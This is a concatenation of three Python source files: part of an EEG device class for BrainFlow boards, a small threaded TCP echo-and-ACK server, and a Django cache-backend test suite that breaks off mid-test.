if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "cyton_wifi":
self.brainflow_id = BoardIds.CYTON_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
self.brainflow_params.ip_port = 6677
elif self.device_name == "cyton_daisy":
self.brainflow_id = BoardIds.CYTON_DAISY_BOARD.value
if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "cyton_daisy_wifi":
self.brainflow_id = BoardIds.CYTON_DAISY_WIFI_BOARD.value
if self.ip_addr is not None:
self.brainflow_params.ip_address = self.ip_addr
elif self.device_name == "brainbit":
self.brainflow_id = BoardIds.BRAINBIT_BOARD.value
elif self.device_name == "unicorn":
self.brainflow_id = BoardIds.UNICORN_BOARD.value
elif self.device_name == "callibri_eeg":
self.brainflow_id = BoardIds.CALLIBRI_EEG_BOARD.value
if self.other:
self.brainflow_params.other_info = str(self.other)
elif self.device_name == "notion1":
self.brainflow_id = BoardIds.NOTION_1_BOARD.value
elif self.device_name == "notion2":
self.brainflow_id = BoardIds.NOTION_2_BOARD.value
elif self.device_name == "freeeeg32":
self.brainflow_id = BoardIds.FREEEEG32_BOARD.value
if self.serial_port is None:
self.brainflow_params.serial_port = get_openbci_usb()
elif self.device_name == "synthetic":
self.brainflow_id = BoardIds.SYNTHETIC_BOARD.value
# some devices allow for an optional serial number parameter for better connection
if self.serial_num:
serial_num = str(self.serial_num)
self.brainflow_params.serial_number = serial_num
if self.serial_port:
serial_port = str(self.serial_port)
self.brainflow_params.serial_port = serial_port
# Initialize board_shim
self.sfreq = BoardShim.get_sampling_rate(self.brainflow_id)
self.board = BoardShim(self.brainflow_id, self.brainflow_params)
self.board.prepare_session()
def _start_brainflow(self):
self.board.start_stream()
# wait for signal to settle
sleep(5)
def _stop_brainflow(self):
"""This functions kills the brainflow backend and saves the data to a CSV file."""
# Collect session data and kill session
data = self.board.get_board_data() # will clear board buffer
self.board.stop_stream()
self.board.release_session()
# transform data for saving
data = data.T # transpose data
# get the channel names for EEG data
if (
self.brainflow_id == BoardIds.GANGLION_BOARD.value
or self.brainflow_id == BoardIds.GANGLION_WIFI_BOARD.value
):
# if a ganglion is used, use recommended default EEG channel names
ch_names = ["fp1", "fp2", "tp7", "tp8"]
elif self.brainflow_id == BoardIds.FREEEEG32_BOARD.value:
ch_names = [f"eeg_{i}" for i in range(0, 32)]
else:
# otherwise select eeg channel names via brainflow API
ch_names = BoardShim.get_eeg_names(self.brainflow_id)
# pull EEG channel data via brainflow API
eeg_data = data[:, BoardShim.get_eeg_channels(self.brainflow_id)]
timestamps = data[:, BoardShim.get_timestamp_channel(self.brainflow_id)]
# Create a column for the stimuli to append to the EEG data
stim_array = create_stim_array(timestamps, self.markers)
timestamps = timestamps[
..., None
] # Add an additional dimension so that shapes match
total_data = np.append(timestamps, eeg_data, 1)
total_data = np.append(
total_data, stim_array, 1
) # Append the stim array to data.
# Subtract five seconds of settling time from beginning
total_data = total_data[5 * self.sfreq :]
data_df = pd.DataFrame(total_data, columns=["timestamps"] + ch_names + ["stim"])
data_df.to_csv(self.save_fn, index=False)
def _brainflow_push_sample(self, marker):
    """Record a marker together with the board's most recent timestamp.

    Parameters:
        marker (int): marker value for the stimulus being presented.
    """
    # NOTE(review): assumes the timestamp channel is the last row of the
    # channels-x-samples snapshot -- confirm against the board's layout.
    snapshot = self.board.get_current_board_data(1)
    last_timestamp = snapshot[-1][0]
    self.markers.append([marker, last_timestamp])
def start(self, fn, duration=None):
    """Starts the EEG device based on the defined backend.

    Parameters:
        fn (str): name of the file to save the sessions data to.
        duration: recording length; forwarded to the muselsl backend only.
    """
    if fn:
        self.save_fn = fn

    backend = self.backend
    if backend == "muselsl":
        self._start_muse(duration)
    elif backend == "brainflow":  # Start brainflow backend
        self._start_brainflow()
        # reset the marker log for the new session
        self.markers = []
def push_sample(self, marker, timestamp):
    """Universal method for pushing a marker and its timestamp to store
    alongside the EEG data.

    Parameters:
        marker (int): marker number for the stimuli being presented.
        timestamp (float): timestamp of stimulus onset from time.time() function.
    """
    backend = self.backend
    if backend == "muselsl":
        self._muse_push_sample(marker=marker, timestamp=timestamp)
    elif backend == "brainflow":
        # brainflow pulls its own timestamp from the board buffer
        self._brainflow_push_sample(marker=marker)
def stop(self):
    """Stop the recording session for the configured backend."""
    # Only brainflow needs explicit teardown (which also saves the CSV);
    # the muselsl backend requires no action here.
    if self.backend == "brainflow":
        self._stop_brainflow()
|
TCPServer_2nodes.py | import socket
import threading
import sys
# Listen on all interfaces, TCP port 9998.
bind_ip = ""
bind_port = 9998

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(8)  # allow a backlog of up to 8 pending connections

print("[*] Listening from %s:%d" % (bind_ip, bind_port))
def handle_client(client_socket):
    """Serve a single client: greet it, log one received packet, ACK, close.

    Parameters:
        client_socket (socket.socket): an already-connected client socket.
    """
    try:
        # Python 3 sockets carry bytes, not str -- the original str
        # arguments raised TypeError on every connection.
        client_socket.send(b"Connected\r\n")
        # print out what the client sends
        request = client_socket.recv(1024)
        print("[*] size of packet (bytes) :", sys.getsizeof(request))
        print("[*] Received: %s" % request)
        # send back a packet
        client_socket.send(b"ACK!\r\n")
    finally:
        # close even if recv/send fails so the fd is not leaked
        client_socket.close()
# Main accept loop: hand each incoming connection to its own thread.
while True:
    client, addr = server.accept()

    print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))

    # spin up our client thread to handle incoming data
    client_handler = threading.Thread(target=handle_client, args=(client,))
    client_handler.start()
|
tests.py | # -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.db import connection, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import (IgnoreDeprecationWarningsMixin,
IgnorePendingDeprecationWarningsMixin)
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
    """Return a fixed value; used to verify functions can be cached."""
    answer = 42
    return answer
class C:
    """Minimal class used to verify classes and methods can be cached."""

    def m(n):
        """Return a fixed value; `n` receives the instance when bound."""
        value = 24
        return value
class Unpickable(object):
    """Object whose pickling always fails; used to test cache error paths."""

    def __getstate__(self):
        # Refuse serialization so cache.set()/add() propagate PickleError.
        raise pickle.PickleError()
@override_settings(CACHES={
    'default': {
        'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
    }
})
class DummyCacheTests(TestCase):
    # The Dummy cache backend doesn't really behave like a test backend,
    # so it has its own test case: every read must come back empty and
    # every write/version operation must be a no-op.

    def test_simple(self):
        "Dummy cache backend ignores cache set calls"
        cache.set("key", "value")
        self.assertEqual(cache.get("key"), None)

    def test_add(self):
        "Add doesn't do anything in dummy cache backend"
        cache.add("addkey1", "value")
        result = cache.add("addkey1", "newvalue")
        # add() reports success even though nothing was stored
        self.assertEqual(result, True)
        self.assertEqual(cache.get("addkey1"), None)

    def test_non_existent(self):
        "Non-existent keys aren't found in the dummy cache backend"
        self.assertEqual(cache.get("does_not_exist"), None)
        self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")

    def test_get_many(self):
        "get_many returns nothing for the dummy cache backend"
        cache.set('a', 'a')
        cache.set('b', 'b')
        cache.set('c', 'c')
        cache.set('d', 'd')
        self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
        self.assertEqual(cache.get_many(['a', 'b', 'e']), {})

    def test_delete(self):
        "Cache deletion is transparently ignored on the dummy cache backend"
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        self.assertEqual(cache.get("key1"), None)
        cache.delete("key1")
        self.assertEqual(cache.get("key1"), None)
        self.assertEqual(cache.get("key2"), None)

    def test_has_key(self):
        "The has_key method doesn't ever return True for the dummy cache backend"
        cache.set("hello1", "goodbye1")
        self.assertEqual(cache.has_key("hello1"), False)
        self.assertEqual(cache.has_key("goodbye1"), False)

    def test_in(self):
        "The in operator doesn't ever return True for the dummy cache backend"
        cache.set("hello2", "goodbye2")
        self.assertEqual("hello2" in cache, False)
        self.assertEqual("goodbye2" in cache, False)

    def test_incr(self):
        "Dummy cache values can't be incremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.incr, 'answer')
        self.assertRaises(ValueError, cache.incr, 'does_not_exist')

    def test_decr(self):
        "Dummy cache values can't be decremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.decr, 'answer')
        self.assertRaises(ValueError, cache.decr, 'does_not_exist')

    def test_data_types(self):
        "All data types are ignored equally by the dummy cache"
        stuff = {
            'string': 'this is a string',
            'int': 42,
            'list': [1, 2, 3, 4],
            'tuple': (1, 2, 3, 4),
            'dict': {'A': 1, 'B': 2},
            'function': f,
            'class': C,
        }
        cache.set("stuff", stuff)
        self.assertEqual(cache.get("stuff"), None)

    def test_expiration(self):
        "Expiration has no effect on the dummy cache"
        cache.set('expire1', 'very quickly', 1)
        cache.set('expire2', 'very quickly', 1)
        cache.set('expire3', 'very quickly', 1)

        time.sleep(2)
        self.assertEqual(cache.get("expire1"), None)

        cache.add("expire2", "newvalue")
        self.assertEqual(cache.get("expire2"), None)
        self.assertEqual(cache.has_key("expire3"), False)

    def test_unicode(self):
        "Unicode values are ignored by the dummy cache"
        stuff = {
            'ascii': 'ascii_value',
            'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
            'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
            'ascii2': {'x': 1}
        }
        for (key, value) in stuff.items():
            cache.set(key, value)
            self.assertEqual(cache.get(key), None)

    def test_set_many(self):
        "set_many does nothing for the dummy cache backend"
        cache.set_many({'a': 1, 'b': 2})
        cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')

    def test_delete_many(self):
        "delete_many does nothing for the dummy cache backend"
        cache.delete_many(['a', 'b'])

    def test_clear(self):
        "clear does nothing for the dummy cache backend"
        cache.clear()

    def test_incr_version(self):
        "Dummy cache versions can't be incremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.incr_version, 'answer')
        self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')

    def test_decr_version(self):
        "Dummy cache versions can't be decremented"
        cache.set('answer', 42)
        self.assertRaises(ValueError, cache.decr_version, 'answer')
        self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
    """Build a cache key of the form ``CUSTOM-<prefix>-<version>-<key>``."""
    parts = (key_prefix, str(version), key)
    return 'CUSTOM-' + '-'.join(parts)
# Base per-alias cache configuration shared by the backend test classes;
# each alias exercises one feature (prefixing, versioning, key functions,
# culling).  Merged with backend-specific settings before use.
_caches_setting_base = {
    'default': {},
    # include the pid so concurrent test runs don't share a prefix
    'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
    'v2': {'VERSION': 2},
    'custom_key': {'KEY_FUNCTION': custom_key_func},
    'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
    'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
    'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
    """Compose a CACHES setting dict for the test suite.

    `base` is used to pull in the backend config (e.g. memcached) from the
    original settings, `params` are test-specific overrides and
    `_caches_setting_base` is the base config for the tests.  Effective
    precedence: params -> _caches_setting_base -> base.
    """
    base = base or {}
    setting = {alias: base.copy() for alias in _caches_setting_base}
    for alias, cache_params in setting.items():
        cache_params.update(_caches_setting_base[alias])
        cache_params.update(params)
    return setting
class BaseCacheTests(object):
    # A common set of tests to apply to all cache backends; concrete
    # subclasses pair this mixin with a TestCase and a CACHES override.

    def setUp(self):
        self.factory = RequestFactory()

    def tearDown(self):
        cache.clear()

    def test_simple(self):
        # Simple cache set/get works
        cache.set("key", "value")
        self.assertEqual(cache.get("key"), "value")

    def test_add(self):
        # A key can be added to a cache
        cache.add("addkey1", "value")
        result = cache.add("addkey1", "newvalue")
        # second add() must not overwrite and must report failure
        self.assertEqual(result, False)
        self.assertEqual(cache.get("addkey1"), "value")

    def test_prefix(self):
        # Test for same cache key conflicts between shared backend
        cache.set('somekey', 'value')

        # should not be set in the prefixed cache
        self.assertFalse(caches['prefix'].has_key('somekey'))

        caches['prefix'].set('somekey', 'value2')

        self.assertEqual(cache.get('somekey'), 'value')
        self.assertEqual(caches['prefix'].get('somekey'), 'value2')

    def test_non_existent(self):
        # Non-existent cache keys return as None/default
        # get with non-existent keys
        self.assertEqual(cache.get("does_not_exist"), None)
        self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")

    def test_get_many(self):
        # Multiple cache keys can be returned using get_many
        cache.set('a', 'a')
        cache.set('b', 'b')
        cache.set('c', 'c')
        cache.set('d', 'd')
        self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
        self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})

    def test_delete(self):
        # Cache keys can be deleted
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        self.assertEqual(cache.get("key1"), "spam")
        cache.delete("key1")
        self.assertEqual(cache.get("key1"), None)
        self.assertEqual(cache.get("key2"), "eggs")

    def test_has_key(self):
        # The cache can be inspected for cache keys
        cache.set("hello1", "goodbye1")
        self.assertEqual(cache.has_key("hello1"), True)
        self.assertEqual(cache.has_key("goodbye1"), False)

    def test_in(self):
        # The in operator can be used to inspect cache contents
        cache.set("hello2", "goodbye2")
        self.assertEqual("hello2" in cache, True)
        self.assertEqual("goodbye2" in cache, False)

    def test_incr(self):
        # Cache values can be incremented
        cache.set('answer', 41)
        self.assertEqual(cache.incr('answer'), 42)
        self.assertEqual(cache.get('answer'), 42)
        self.assertEqual(cache.incr('answer', 10), 52)
        self.assertEqual(cache.get('answer'), 52)
        self.assertEqual(cache.incr('answer', -10), 42)
        self.assertRaises(ValueError, cache.incr, 'does_not_exist')

    def test_decr(self):
        # Cache values can be decremented
        cache.set('answer', 43)
        self.assertEqual(cache.decr('answer'), 42)
        self.assertEqual(cache.get('answer'), 42)
        self.assertEqual(cache.decr('answer', 10), 32)
        self.assertEqual(cache.get('answer'), 32)
        self.assertEqual(cache.decr('answer', -10), 42)
        self.assertRaises(ValueError, cache.decr, 'does_not_exist')

    def test_close(self):
        # close() must exist and be callable on every backend
        self.assertTrue(hasattr(cache, 'close'))
        cache.close()

    def test_data_types(self):
        # Many different data types can be cached
        stuff = {
            'string': 'this is a string',
            'int': 42,
            'list': [1, 2, 3, 4],
            'tuple': (1, 2, 3, 4),
            'dict': {'A': 1, 'B': 2},
            'function': f,
            'class': C,
        }
        cache.set("stuff", stuff)
        self.assertEqual(cache.get("stuff"), stuff)

    def test_cache_read_for_model_instance(self):
        # Don't want fields with callable as default to be called on cache read
        expensive_calculation.num_runs = 0
        Poll.objects.all().delete()
        my_poll = Poll.objects.create(question="Well?")
        self.assertEqual(Poll.objects.count(), 1)
        pub_date = my_poll.pub_date
        cache.set('question', my_poll)
        cached_poll = cache.get('question')
        self.assertEqual(cached_poll.pub_date, pub_date)
        # We only want the default expensive calculation run once
        self.assertEqual(expensive_calculation.num_runs, 1)

    def test_cache_write_for_model_instance_with_deferred(self):
        # Don't want fields with callable as default to be called on cache write
        expensive_calculation.num_runs = 0
        Poll.objects.all().delete()
        Poll.objects.create(question="What?")
        self.assertEqual(expensive_calculation.num_runs, 1)
        defer_qs = Poll.objects.all().defer('question')
        self.assertEqual(defer_qs.count(), 1)
        self.assertEqual(expensive_calculation.num_runs, 1)
        cache.set('deferred_queryset', defer_qs)
        # cache set should not re-evaluate default functions
        self.assertEqual(expensive_calculation.num_runs, 1)

    def test_cache_read_for_model_instance_with_deferred(self):
        # Don't want fields with callable as default to be called on cache read
        expensive_calculation.num_runs = 0
        Poll.objects.all().delete()
        Poll.objects.create(question="What?")
        self.assertEqual(expensive_calculation.num_runs, 1)
        defer_qs = Poll.objects.all().defer('question')
        self.assertEqual(defer_qs.count(), 1)
        cache.set('deferred_queryset', defer_qs)
        self.assertEqual(expensive_calculation.num_runs, 1)
        runs_before_cache_read = expensive_calculation.num_runs
        cache.get('deferred_queryset')
        # We only want the default expensive calculation run on creation and set
        self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)

    def test_expiration(self):
        # Cache values can be set to expire
        cache.set('expire1', 'very quickly', 1)
        cache.set('expire2', 'very quickly', 1)
        cache.set('expire3', 'very quickly', 1)

        time.sleep(2)
        self.assertEqual(cache.get("expire1"), None)

        # add() succeeds once the old entry has expired
        cache.add("expire2", "newvalue")
        self.assertEqual(cache.get("expire2"), "newvalue")
        self.assertEqual(cache.has_key("expire3"), False)

    def test_unicode(self):
        # Unicode values can be cached
        stuff = {
            'ascii': 'ascii_value',
            'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
            'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
            'ascii2': {'x': 1}
        }
        # Test `set`
        for (key, value) in stuff.items():
            cache.set(key, value)
            self.assertEqual(cache.get(key), value)

        # Test `add`
        for (key, value) in stuff.items():
            cache.delete(key)
            cache.add(key, value)
            self.assertEqual(cache.get(key), value)

        # Test `set_many`
        for (key, value) in stuff.items():
            cache.delete(key)
        cache.set_many(stuff)
        for (key, value) in stuff.items():
            self.assertEqual(cache.get(key), value)

    def test_binary_string(self):
        # Binary strings should be cacheable
        from zlib import compress, decompress
        value = 'value_to_be_compressed'
        compressed_value = compress(value.encode())

        # Test set
        cache.set('binary1', compressed_value)
        compressed_result = cache.get('binary1')
        self.assertEqual(compressed_value, compressed_result)
        self.assertEqual(value, decompress(compressed_result).decode())

        # Test add
        cache.add('binary1-add', compressed_value)
        compressed_result = cache.get('binary1-add')
        self.assertEqual(compressed_value, compressed_result)
        self.assertEqual(value, decompress(compressed_result).decode())

        # Test set_many
        cache.set_many({'binary1-set_many': compressed_value})
        compressed_result = cache.get('binary1-set_many')
        self.assertEqual(compressed_value, compressed_result)
        self.assertEqual(value, decompress(compressed_result).decode())

    def test_set_many(self):
        # Multiple keys can be set using set_many
        cache.set_many({"key1": "spam", "key2": "eggs"})
        self.assertEqual(cache.get("key1"), "spam")
        self.assertEqual(cache.get("key2"), "eggs")

    def test_set_many_expiration(self):
        # set_many takes a second ``timeout`` parameter
        cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
        time.sleep(2)
        self.assertEqual(cache.get("key1"), None)
        self.assertEqual(cache.get("key2"), None)

    def test_delete_many(self):
        # Multiple keys can be deleted using delete_many
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        cache.set("key3", "ham")
        cache.delete_many(["key1", "key2"])
        self.assertEqual(cache.get("key1"), None)
        self.assertEqual(cache.get("key2"), None)
        self.assertEqual(cache.get("key3"), "ham")

    def test_clear(self):
        # The cache can be emptied using clear
        cache.set("key1", "spam")
        cache.set("key2", "eggs")
        cache.clear()
        self.assertEqual(cache.get("key1"), None)
        self.assertEqual(cache.get("key2"), None)

    def test_long_timeout(self):
        '''
        Using a timeout greater than 30 days makes memcached think
        it is an absolute expiration timestamp instead of a relative
        offset. Test that we honour this convention. Refs #12399.
        '''
        cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1)  # 30 days + 1 second
        self.assertEqual(cache.get('key1'), 'eggs')

        cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
        self.assertEqual(cache.get('key2'), 'ham')

        cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
        self.assertEqual(cache.get('key3'), 'sausage')
        self.assertEqual(cache.get('key4'), 'lobster bisque')

    def test_forever_timeout(self):
        '''
        Passing in None into timeout results in a value that is cached forever
        '''
        cache.set('key1', 'eggs', None)
        self.assertEqual(cache.get('key1'), 'eggs')

        cache.add('key2', 'ham', None)
        self.assertEqual(cache.get('key2'), 'ham')

        cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
        self.assertEqual(cache.get('key3'), 'sausage')
        self.assertEqual(cache.get('key4'), 'lobster bisque')

    def test_zero_timeout(self):
        '''
        Passing in zero into timeout results in a value that is not cached
        '''
        cache.set('key1', 'eggs', 0)
        self.assertEqual(cache.get('key1'), None)

        cache.add('key2', 'ham', 0)
        self.assertEqual(cache.get('key2'), None)

        cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
        self.assertEqual(cache.get('key3'), None)
        self.assertEqual(cache.get('key4'), None)

    def test_float_timeout(self):
        # Make sure a timeout given as a float doesn't crash anything.
        cache.set("key1", "spam", 100.2)
        self.assertEqual(cache.get("key1"), "spam")

    def _perform_cull_test(self, cull_cache, initial_count, final_count):
        # Create initial cache key entries. This will overflow the cache,
        # causing a cull.
        for i in range(1, initial_count):
            cull_cache.set('cull%d' % i, 'value', 1000)
        count = 0
        # Count how many keys are left in the cache.
        for i in range(1, initial_count):
            if cull_cache.has_key('cull%d' % i):
                count = count + 1
        self.assertEqual(count, final_count)

    def test_cull(self):
        self._perform_cull_test(caches['cull'], 50, 29)

    def test_zero_cull(self):
        self._perform_cull_test(caches['zero_cull'], 50, 19)

    def test_invalid_keys(self):
        """
        All the builtin backends (except memcached, see below) should warn on
        keys that would be refused by memcached. This encourages portable
        caching code without making it too difficult to use production backends
        with more liberal key rules. Refs #6447.
        """
        # mimic custom ``make_key`` method being defined since the default will
        # never show the below warnings
        def func(key, *args):
            return key

        old_func = cache.key_func
        cache.key_func = func

        try:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter("always")
                # memcached does not allow whitespace or control characters in keys
                cache.set('key with spaces', 'value')
                self.assertEqual(len(w), 2)
                self.assertIsInstance(w[0].message, CacheKeyWarning)
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter("always")
                # memcached limits key length to 250
                cache.set('a' * 251, 'value')
                self.assertEqual(len(w), 1)
                self.assertIsInstance(w[0].message, CacheKeyWarning)
        finally:
            # restore the original key function for subsequent tests
            cache.key_func = old_func

    def test_cache_versioning_get_set(self):
        # set, using default version = 1
        cache.set('answer1', 42)
        self.assertEqual(cache.get('answer1'), 42)
        self.assertEqual(cache.get('answer1', version=1), 42)
        self.assertEqual(cache.get('answer1', version=2), None)

        self.assertEqual(caches['v2'].get('answer1'), None)
        self.assertEqual(caches['v2'].get('answer1', version=1), 42)
        self.assertEqual(caches['v2'].get('answer1', version=2), None)

        # set, default version = 1, but manually override version = 2
        cache.set('answer2', 42, version=2)
        self.assertEqual(cache.get('answer2'), None)
        self.assertEqual(cache.get('answer2', version=1), None)
        self.assertEqual(cache.get('answer2', version=2), 42)

        self.assertEqual(caches['v2'].get('answer2'), 42)
        self.assertEqual(caches['v2'].get('answer2', version=1), None)
        self.assertEqual(caches['v2'].get('answer2', version=2), 42)

        # v2 set, using default version = 2
        caches['v2'].set('answer3', 42)
        self.assertEqual(cache.get('answer3'), None)
        self.assertEqual(cache.get('answer3', version=1), None)
        self.assertEqual(cache.get('answer3', version=2), 42)

        self.assertEqual(caches['v2'].get('answer3'), 42)
        self.assertEqual(caches['v2'].get('answer3', version=1), None)
        self.assertEqual(caches['v2'].get('answer3', version=2), 42)

        # v2 set, default version = 2, but manually override version = 1
        caches['v2'].set('answer4', 42, version=1)
        self.assertEqual(cache.get('answer4'), 42)
        self.assertEqual(cache.get('answer4', version=1), 42)
        self.assertEqual(cache.get('answer4', version=2), None)

        self.assertEqual(caches['v2'].get('answer4'), None)
        self.assertEqual(caches['v2'].get('answer4', version=1), 42)
        self.assertEqual(caches['v2'].get('answer4', version=2), None)

    def test_cache_versioning_add(self):
        # add, default version = 1, but manually override version = 2
        cache.add('answer1', 42, version=2)
        self.assertEqual(cache.get('answer1', version=1), None)
        self.assertEqual(cache.get('answer1', version=2), 42)

        cache.add('answer1', 37, version=2)
        self.assertEqual(cache.get('answer1', version=1), None)
        self.assertEqual(cache.get('answer1', version=2), 42)

        cache.add('answer1', 37, version=1)
        self.assertEqual(cache.get('answer1', version=1), 37)
        self.assertEqual(cache.get('answer1', version=2), 42)

        # v2 add, using default version = 2
        caches['v2'].add('answer2', 42)
        self.assertEqual(cache.get('answer2', version=1), None)
        self.assertEqual(cache.get('answer2', version=2), 42)

        caches['v2'].add('answer2', 37)
        self.assertEqual(cache.get('answer2', version=1), None)
        self.assertEqual(cache.get('answer2', version=2), 42)

        caches['v2'].add('answer2', 37, version=1)
        self.assertEqual(cache.get('answer2', version=1), 37)
        self.assertEqual(cache.get('answer2', version=2), 42)

        # v2 add, default version = 2, but manually override version = 1
        caches['v2'].add('answer3', 42, version=1)
        self.assertEqual(cache.get('answer3', version=1), 42)
        self.assertEqual(cache.get('answer3', version=2), None)

        caches['v2'].add('answer3', 37, version=1)
        self.assertEqual(cache.get('answer3', version=1), 42)
        self.assertEqual(cache.get('answer3', version=2), None)

        caches['v2'].add('answer3', 37)
        self.assertEqual(cache.get('answer3', version=1), 42)
        self.assertEqual(cache.get('answer3', version=2), 37)

    def test_cache_versioning_has_key(self):
        cache.set('answer1', 42)

        # has_key
        self.assertTrue(cache.has_key('answer1'))
        self.assertTrue(cache.has_key('answer1', version=1))
        self.assertFalse(cache.has_key('answer1', version=2))

        self.assertFalse(caches['v2'].has_key('answer1'))
        self.assertTrue(caches['v2'].has_key('answer1', version=1))
        self.assertFalse(caches['v2'].has_key('answer1', version=2))

    def test_cache_versioning_delete(self):
        cache.set('answer1', 37, version=1)
        cache.set('answer1', 42, version=2)
        cache.delete('answer1')
        self.assertEqual(cache.get('answer1', version=1), None)
        self.assertEqual(cache.get('answer1', version=2), 42)

        cache.set('answer2', 37, version=1)
        cache.set('answer2', 42, version=2)
        cache.delete('answer2', version=2)
        self.assertEqual(cache.get('answer2', version=1), 37)
        self.assertEqual(cache.get('answer2', version=2), None)

        cache.set('answer3', 37, version=1)
        cache.set('answer3', 42, version=2)
        caches['v2'].delete('answer3')
        self.assertEqual(cache.get('answer3', version=1), 37)
        self.assertEqual(cache.get('answer3', version=2), None)

        cache.set('answer4', 37, version=1)
        cache.set('answer4', 42, version=2)
        caches['v2'].delete('answer4', version=1)
        self.assertEqual(cache.get('answer4', version=1), None)
        self.assertEqual(cache.get('answer4', version=2), 42)

    def test_cache_versioning_incr_decr(self):
        cache.set('answer1', 37, version=1)
        cache.set('answer1', 42, version=2)
        cache.incr('answer1')
        self.assertEqual(cache.get('answer1', version=1), 38)
        self.assertEqual(cache.get('answer1', version=2), 42)
        cache.decr('answer1')
        self.assertEqual(cache.get('answer1', version=1), 37)
        self.assertEqual(cache.get('answer1', version=2), 42)

        cache.set('answer2', 37, version=1)
        cache.set('answer2', 42, version=2)
        cache.incr('answer2', version=2)
        self.assertEqual(cache.get('answer2', version=1), 37)
        self.assertEqual(cache.get('answer2', version=2), 43)
        cache.decr('answer2', version=2)
        self.assertEqual(cache.get('answer2', version=1), 37)
        self.assertEqual(cache.get('answer2', version=2), 42)

        cache.set('answer3', 37, version=1)
        cache.set('answer3', 42, version=2)
        caches['v2'].incr('answer3')
        self.assertEqual(cache.get('answer3', version=1), 37)
        self.assertEqual(cache.get('answer3', version=2), 43)
        caches['v2'].decr('answer3')
        self.assertEqual(cache.get('answer3', version=1), 37)
        self.assertEqual(cache.get('answer3', version=2), 42)

        cache.set('answer4', 37, version=1)
        cache.set('answer4', 42, version=2)
        caches['v2'].incr('answer4', version=1)
        self.assertEqual(cache.get('answer4', version=1), 38)
        self.assertEqual(cache.get('answer4', version=2), 42)
        caches['v2'].decr('answer4', version=1)
        self.assertEqual(cache.get('answer4', version=1), 37)
        self.assertEqual(cache.get('answer4', version=2), 42)

    def test_cache_versioning_get_set_many(self):
        # set, using default version = 1
        cache.set_many({'ford1': 37, 'arthur1': 42})
        self.assertEqual(cache.get_many(['ford1', 'arthur1']),
                         {'ford1': 37, 'arthur1': 42})
        self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
                         {'ford1': 37, 'arthur1': 42})
        self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})

        self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
        self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
                         {'ford1': 37, 'arthur1': 42})
        self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})

        # set, default version = 1, but manually override version = 2
        cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
        self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
        self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
        self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
                         {'ford2': 37, 'arthur2': 42})

        self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
                         {'ford2': 37, 'arthur2': 42})
        self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
        self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
